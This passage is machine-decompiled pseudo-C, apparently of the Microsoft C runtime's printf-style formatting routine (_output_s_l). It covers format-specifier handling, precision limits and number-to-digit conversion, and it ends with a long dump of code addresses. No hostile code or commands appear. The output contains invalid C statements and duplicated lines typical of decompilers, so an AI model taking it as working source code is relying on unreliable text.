															 *(__ebp - 4) =  *(__edx + 4);
															__ecx =  *(__ebp - 0x288);
															__eax =  *__ecx;
															asm("cdq");
															 *__ecx - __edx =  *__ecx - __edx >> 1;
															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
															 *(__ebp - 0xc) = 1;
														}
														goto L87;
													}
													goto L83;
												case 5:
													L123:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													__eax = __ebp - 0x248;
													 *(__ebp - 4) = __ebp - 0x248;
													 *(__ebp - 0x44) = 0x200;
													__eflags =  *(__ebp - 0x30);
													if( *(__ebp - 0x30) >= 0) {
														L125:
														__eflags =  *(__ebp - 0x30);
														if( *(__ebp - 0x30) != 0) {
															L128:
															__eflags =  *(__ebp - 0x30) - 0x200;
															if( *(__ebp - 0x30) > 0x200) {
																 *(__ebp - 0x30) = 0x200;
															}
															L130:
															__eflags =  *(__ebp - 0x30) - 0xa3;
															if( *(__ebp - 0x30) > 0xa3) {
																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																__eflags =  *(__ebp - 0x20);
																if( *(__ebp - 0x20) == 0) {
																	 *(__ebp - 0x30) = 0xa3;
																} else {
																	__eax =  *(__ebp - 0x20);
																	 *(__ebp - 4) =  *(__ebp - 0x20);
																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																}
															}
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
															__eax =  *(__ebp + 0x14);
															__ecx =  *(__eax - 8);
															__edx =  *(__eax - 4);
															 *(__ebp - 0x2a8) =  *(__eax - 8);
															 *(__ebp - 0x2a4) =  *(__eax - 4);
															__ecx = __ebp - 0x40;
															_push(E004103A0(__ebp - 0x40));
															__eax =  *(__ebp - 0x2c);
															_push( *(__ebp - 0x2c));
															__ecx =  *(__ebp - 0x30);
															_push( *(__ebp - 0x30));
															__edx =  *((char*)(__ebp - 0x251));
															_push( *((char*)(__ebp - 0x251)));
															__eax =  *(__ebp - 0x44);
															_push( *(__ebp - 0x44));
															__ecx =  *(__ebp - 4);
															_push( *(__ebp - 4));
															__edx = __ebp - 0x2a8;
															_push(__ebp - 0x2a8);
															__eax =  *0x4bb808; // 0x776010b9
															__eax =  *__eax();
															__esp = __esp + 0x1c;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
															__eflags =  *(__ebp - 0x10) & 0x00000080;
															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__edx =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__eax =  *0x4bb814; // 0x776010b9
																	__eax =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__ecx =  *((char*)(__ebp - 0x251));
															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
															if( *((char*)(__ebp - 0x251)) == 0x67) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																__eflags =  *(__ebp - 0x10) & 0x00000080;
																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																	__ecx = __ebp - 0x40;
																	_push(E004103A0(__ebp - 0x40));
																	__eax =  *(__ebp - 4);
																	_push( *(__ebp - 4));
																	__ecx =  *0x4bb810; // 0x776010b9
																	E00411D00(__ecx) =  *__eax();
																	__esp = __esp + 8;
																}
															}
															__edx =  *(__ebp - 4);
															__eax =  *( *(__ebp - 4));
															__eflags =  *( *(__ebp - 4)) - 0x2d;
															if( *( *(__ebp - 4)) == 0x2d) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																__edx =  *(__ebp - 4);
																__edx =  *(__ebp - 4) + 1;
																__eflags = __edx;
																 *(__ebp - 4) = __edx;
															}
															__eax =  *(__ebp - 4);
															 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
															do {
																L190:
																if( *(_t627 - 0x28) != 0) {
																	goto L216;
																}
																goto L191;
															} while ( *(__ebp - 0x324) > 0x37);
															goto L72;
														}
														L126:
														__ecx =  *((char*)(__ebp - 0x251));
														__eflags = __ecx - 0x67;
														if(__ecx != 0x67) {
															goto L128;
														}
														L127:
														 *(__ebp - 0x30) = 1;
														goto L130;
													}
													L124:
													 *(__ebp - 0x30) = 6;
													goto L130;
												case 6:
													L75:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
													__eflags =  *(__ebp - 0x10) & 0x00000810;
													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
														__ebp + 0x14 = E0041F270(__ebp + 0x14);
														 *(__ebp - 0x284) = __ax;
														__cl =  *(__ebp - 0x284);
														 *(__ebp - 0x248) = __cl;
														 *(__ebp - 0x24) = 1;
													} else {
														 *(__ebp - 0x280) = 0;
														__edx = __ebp + 0x14;
														__eax = E00421650(__ebp + 0x14);
														 *(__ebp - 0x258) = __ax;
														__eax =  *(__ebp - 0x258) & 0x0000ffff;
														__ecx = __ebp - 0x248;
														__edx = __ebp - 0x24;
														 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
														__eflags =  *(__ebp - 0x280);
														if( *(__ebp - 0x280) != 0) {
															 *(__ebp - 0x28) = 1;
														}
													}
													__edx = __ebp - 0x248;
													 *(__ebp - 4) = __ebp - 0x248;
													while(1) {
														L190:
														if( *(_t627 - 0x28) != 0) {
															goto L216;
														}
														goto L191;
													}
												case 7:
													L143:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
													 *(__ebp - 8) = 0xa;
													goto L153;
												case 8:
													goto L0;
												case 9:
													L151:
													 *(__ebp - 8) = 8;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														__edx =  *(__ebp - 0x10);
														__edx =  *(__ebp - 0x10) | 0x00000200;
														__eflags = __edx;
														 *(__ebp - 0x10) = __edx;
													}
													goto L153;
												case 0xa:
													L145:
													 *(__ebp - 0x30) = 8;
													goto L146;
												case 0xb:
													L90:
													__eflags =  *(__ebp - 0x30) - 0xffffffff;
													if( *(__ebp - 0x30) != 0xffffffff) {
														__edx =  *(__ebp - 0x30);
														 *(__ebp - 0x328) =  *(__ebp - 0x30);
													} else {
														 *(__ebp - 0x328) = 0x7fffffff;
													}
													__eax =  *(__ebp - 0x328);
													 *(__ebp - 0x290) =  *(__ebp - 0x328);
													__ecx = __ebp + 0x14;
													 *(__ebp - 4) = E0041F270(__ebp + 0x14);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
													__eflags =  *(__ebp - 0x10) & 0x00000810;
													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
														L101:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__edx =  *0x4bc060; // 0x408114
															 *(__ebp - 4) = __edx;
														}
														__eax =  *(__ebp - 4);
														 *(__ebp - 0x28c) =  *(__ebp - 4);
														while(1) {
															L104:
															__ecx =  *(__ebp - 0x290);
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															__eflags = __ecx;
															if(__ecx == 0) {
																break;
															}
															L105:
															__eax =  *(__ebp - 0x28c);
															__ecx =  *( *(__ebp - 0x28c));
															__eflags = __ecx;
															if(__ecx == 0) {
																break;
															}
															L106:
															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
														}
														L107:
														__eax =  *(__ebp - 0x28c);
														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
														__eflags = __eax;
														 *(__ebp - 0x24) = __eax;
														goto L108;
													} else {
														L94:
														__eflags =  *(__ebp - 4);
														if( *(__ebp - 4) == 0) {
															__eax =  *0x4bc064; // 0x408104
															 *(__ebp - 4) = __eax;
														}
														 *(__ebp - 0xc) = 1;
														__ecx =  *(__ebp - 4);
														 *(__ebp - 0x294) =  *(__ebp - 4);
														while(1) {
															L97:
															__edx =  *(__ebp - 0x290);
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
															__eflags =  *(__ebp - 0x290);
															if( *(__ebp - 0x290) == 0) {
																break;
															}
															L98:
															__ecx =  *(__ebp - 0x294);
															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																break;
															}
															L99:
															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
														}
														L100:
														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
														 *(__ebp - 0x24) = __ecx;
														L108:
														while(1) {
															L190:
															if( *(_t627 - 0x28) != 0) {
																goto L216;
															}
															goto L191;
														}
													}
												case 0xc:
													L144:
													 *(__ebp - 8) = 0xa;
													goto L153;
												case 0xd:
													L147:
													 *(__ebp - 0x260) = 0x27;
													L148:
													 *(__ebp - 8) = 0x10;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
													__eflags =  *(__ebp - 0x10) & 0x00000080;
													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
														 *((char*)(__ebp - 0x14)) = 0x30;
														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
														__eflags =  *(__ebp - 0x260) + 0x51;
														 *((char*)(__ebp - 0x13)) = __al;
														 *(__ebp - 0x1c) = 2;
													}
													L153:
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
													__eflags =  *(__ebp - 0x10) & 0x00008000;
													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
														__eflags =  *(__ebp - 0x10) & 0x00001000;
														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
															__eflags =  *(__ebp - 0x10) & 0x00000020;
															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__edx = 0;
																	__eflags = 0;
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = 0;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = __edx;
																}
															} else {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
																__eflags =  *(__ebp - 0x10) & 0x00000040;
																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
																	__ecx = __ebp + 0x14;
																	E0041F270(__ebp + 0x14) = __ax & 0x0000ffff;
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
																	 *(__ebp - 0x2b4) = __edx;
																} else {
																	__eax = __ebp + 0x14;
																	__eax = E0041F270(__ebp + 0x14);
																	__ax = __eax;
																	asm("cdq");
																	 *(__ebp - 0x2b8) = __eax;
																	 *(__ebp - 0x2b4) = __edx;
																}
															}
														} else {
															__eax = __ebp + 0x14;
															 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
															 *(__ebp - 0x2b4) = __edx;
														}
													} else {
														__ecx = __ebp + 0x14;
														 *(__ebp - 0x2b8) = E0041F290(__ebp + 0x14);
														 *(__ebp - 0x2b4) = __edx;
													}
													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
													__eflags =  *(__ebp - 0x10) & 0x00000040;
													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
														L170:
														__ecx =  *(__ebp - 0x2b8);
														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
														__edx =  *(__ebp - 0x2b4);
														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
														goto L171;
													} else {
														L166:
														__eflags =  *(__ebp - 0x2b4);
														if(__eflags > 0) {
															goto L170;
														}
														L167:
														if(__eflags < 0) {
															L169:
															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
															__edx =  *(__ebp - 0x2b4);
															asm("adc edx, 0x0");
															__edx =  ~( *(__ebp - 0x2b4));
															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
															L171:
															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
															__eflags =  *(__ebp - 0x10) & 0x00008000;
															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
																__eflags =  *(__ebp - 0x10) & 0x00001000;
																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
																	__edx =  *(__ebp - 0x2c0);
																	__eax =  *(__ebp - 0x2bc);
																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
																	__eflags = __eax;
																	 *(__ebp - 0x2bc) = __eax;
																}
															}
															__eflags =  *(__ebp - 0x30);
															if( *(__ebp - 0x30) >= 0) {
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
																__eflags =  *(__ebp - 0x30) - 0x200;
																if( *(__ebp - 0x30) > 0x200) {
																	 *(__ebp - 0x30) = 0x200;
																}
															} else {
																 *(__ebp - 0x30) = 1;
															}
															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
																 *(__ebp - 0x1c) = 0;
															}
															__eax = __ebp - 0x49;
															 *(__ebp - 4) = __ebp - 0x49;
															while(1) {
																L181:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L183;
																}
																L182:
																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
																	goto L186;
																}
																L183:
																__eax =  *(__ebp - 8);
																asm("cdq");
																__ecx =  *(__ebp - 0x2bc);
																__edx =  *(__ebp - 0x2c0);
																__eax = E00421720( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
																 *(__ebp - 0x2ac) = __eax;
																__eax =  *(__ebp - 8);
																asm("cdq");
																__eax =  *(__ebp - 0x2bc);
																__ecx =  *(__ebp - 0x2c0);
																 *(__ebp - 0x2c0) = E004216B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
																 *(__ebp - 0x2bc) = __edx;
																__eflags =  *(__ebp - 0x2ac) - 0x39;
																if( *(__ebp - 0x2ac) > 0x39) {
																	__edx =  *(__ebp - 0x2ac);
																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
																	__eflags = __edx;
																	 *(__ebp - 0x2ac) = __edx;
																}
																__eax =  *(__ebp - 4);
																__cl =  *(__ebp - 0x2ac);
																 *( *(__ebp - 4)) = __cl;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																 *(__ebp - 4) =  *(__ebp - 4) - 1;
																L181:
																__ecx =  *(__ebp - 0x30);
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) > 0) {
																	goto L183;
																}
																goto L182;
															}
														}
														L168:
														__eflags =  *(__ebp - 0x2b8);
														if( *(__ebp - 0x2b8) >= 0) {
															goto L170;
														}
														goto L169;
													}
												case 0xe:
													while(1) {
														L190:
														if( *(_t627 - 0x28) != 0) {
															goto L216;
														}
														goto L191;
													}
											}
										case 8:
											L30:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
											goto L33;
										case 9:
											L31:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
											goto L33;
										case 0xa:
											L29:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000001;
											 *(__ebp - 0x10) = __ecx;
											goto L33;
										case 0xb:
											L28:
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
											goto L33;
										case 0xc:
											L32:
											__ecx =  *(__ebp - 0x10);
											__ecx =  *(__ebp - 0x10) | 0x00000008;
											__eflags = __ecx;
											 *(__ebp - 0x10) = __ecx;
											goto L33;
										case 0xd:
											L33:
											goto L218;
									}
								} else {
									if(0 == 0) {
										 *(_t627 - 0x314) = 0;
									} else {
										 *(_t627 - 0x314) = 1;
									}
									_t574 =  *(_t627 - 0x314);
									 *(_t627 - 0x278) =  *(_t627 - 0x314);
									if( *(_t627 - 0x278) == 0) {
										_push(L"(\"Incorrect format specifier\", 0)");
										_push(0);
										_push(0x460);
										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
										_push(2);
										_t529 = L0040C820();
										_t630 = _t630 + 0x14;
										if(_t529 == 1) {
											asm("int3");
										}
									}
									L14:
									if( *(_t627 - 0x278) != 0) {
										goto L16;
									} else {
										 *((intOrPtr*)(L00411810(_t574))) = 0x16;
										E0040C660(_t558, _t574, _t625, _t626, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
										 *(_t627 - 0x2f0) = 0xffffffff;
										E00410370(_t627 - 0x40);
										_t502 =  *(_t627 - 0x2f0);
										goto L229;
									}
								}
							}
							L219:
							if( *(_t627 - 0x25c) == 0) {
								L222:
								 *(_t627 - 0x334) = 1;
								L223:
								_t561 =  *(_t627 - 0x334);
								 *(_t627 - 0x2e0) =  *(_t627 - 0x334);
								if( *(_t627 - 0x2e0) == 0) {
									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
									_push(0);
									_push(0x8f5);
									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
									_push(2);
									_t507 = L0040C820();
									_t630 = _t630 + 0x14;
									if(_t507 == 1) {
										asm("int3");
									}
								}
								if( *(_t627 - 0x2e0) != 0) {
									 *(_t627 - 0x300) =  *(_t627 - 0x24c);
									E00410370(_t627 - 0x40);
									_t502 =  *(_t627 - 0x300);
								} else {
									 *((intOrPtr*)(L00411810(_t561))) = 0x16;
									E0040C660(_t558, _t561, _t625, _t626, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
									 *(_t627 - 0x2fc) = 0xffffffff;
									E00410370(_t627 - 0x40);
									_t502 =  *(_t627 - 0x2fc);
								}
								goto L229;
							}
							L220:
							if( *(_t627 - 0x25c) == 7) {
								goto L222;
							}
							L221:
							 *(_t627 - 0x334) = 0;
							goto L223;
						}
					} else {
						L116:
						 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
						__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
						 *(__ebp - 0x2f8) = 0xffffffff;
						__ecx = __ebp - 0x40;
						__eax = E00410370(__ecx);
						__eax =  *(__ebp - 0x2f8);
						L229:
						return E00410900(_t502, _t558,  *(_t627 - 0x48) ^ _t627, _t598, _t625, _t626);
					}
					L118:
					if(( *(_t627 - 0x10) & 0x00000020) == 0) {
						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
					} else {
						 *( *(_t627 - 0x298)) =  *(_t627 - 0x24c);
					}
					 *(_t627 - 0x28) = 1;
					goto L190;
				}
			}

0x00422227
0x00422227
0x00422227
0x0042222b
0x00422230
0x00422233
0x00422240
0x00000000
0x00000000
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422293
0x00422295
0x00422295
0x00422293
0x0042229d
0x004222e5
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x004227dc
0x004227e2
0x004227ec
0x00422801
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x0042282c
0x00422838
0x0042284e
0x00422853
0x00422853
0x00422869
0x0042286e
0x00422877
0x0042287f
0x00422895
0x0042289a
0x0042289a
0x0042287f
0x004228a1
0x00422975
0x00422988
0x0042298d
0x00000000
0x004228a7
0x004228a7
0x004228ab
0x00000000
0x00000000
0x004228b1
0x004228b1
0x004228be
0x004228c7
0x004228cd
0x004228cd
0x004228dc
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228f3
0x00422912
0x00422917
0x0042291a
0x00422929
0x00422936
0x00422941
0x00422941
0x00000000
0x00422941
0x00422938
0x0042293f
0x0042294d
0x00422966
0x0042296b
0x00000000
0x0042296b
0x00000000
0x0042293f
0x00422973
0x00422990
0x00422997
0x0042299f
0x004229b5
0x004229ba
0x004229ba
0x0042299f
0x00422997
0x004229bd
0x004229c1
0x004229c9
0x004229ce
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c33
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9a
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d5e
0x00421d65
0x00000000
0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dbe
0x00421dc1
0x00421deb
0x00421dee
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd2
0x00421dd6
0x00421dd8
0x00421ddb
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e17
0x00421e1a
0x00421e3a
0x00421e3d
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2b
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e6f
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec5
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef6
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f24
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f2f
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3a
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f45
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f50
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5b
0x00421f5e
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f02
0x00421f05
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421f05
0x00421eca
0x00421eca
0x00421ecd
0x00421ed1
0x00421ed4
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00421ee8
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e96
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f7e
0x00421f81
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f8e
0x00421f8e
0x00421f95
0x00421fa1
0x00421fa4
0x00421faa
0x00421fb1
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042278c
0x0042278f
0x00422792
0x00422795
0x00422798
0x0042279b
0x004227a1
0x004227a1
0x004227a1
0x004227a9
0x004227ad
0x00000000
0x00000000
0x004227af
0x004227af
0x004227b2
0x004227b5
0x004227b5
0x004227ba
0x004227bd
0x004227c0
0x004227c3
0x004227c6
0x004227c9
0x004227cc
0x004227cc
0x004227cf
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00421fb7
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fce
0x00421fd4
0x00421fd6
0x00421fd9
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x0042210e
0x00422113
0x00422115
0x00422118
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00000000
0x00000000
0x00422075
0x00422075
0x00422081
0x00422087
0x0042208e
0x0042209c
0x0042209c
0x004220a2
0x004220a5
0x004220b1
0x00422106
0x00000000
0x00422106
0x00422090
0x00422090
0x00422096
0x0042209a
0x004220b6
0x004220b9
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00000000
0x004220bf
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x0042234e
0x00422352
0x0042235d
0x0042235d
0x00422361
0x00422378
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b2
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
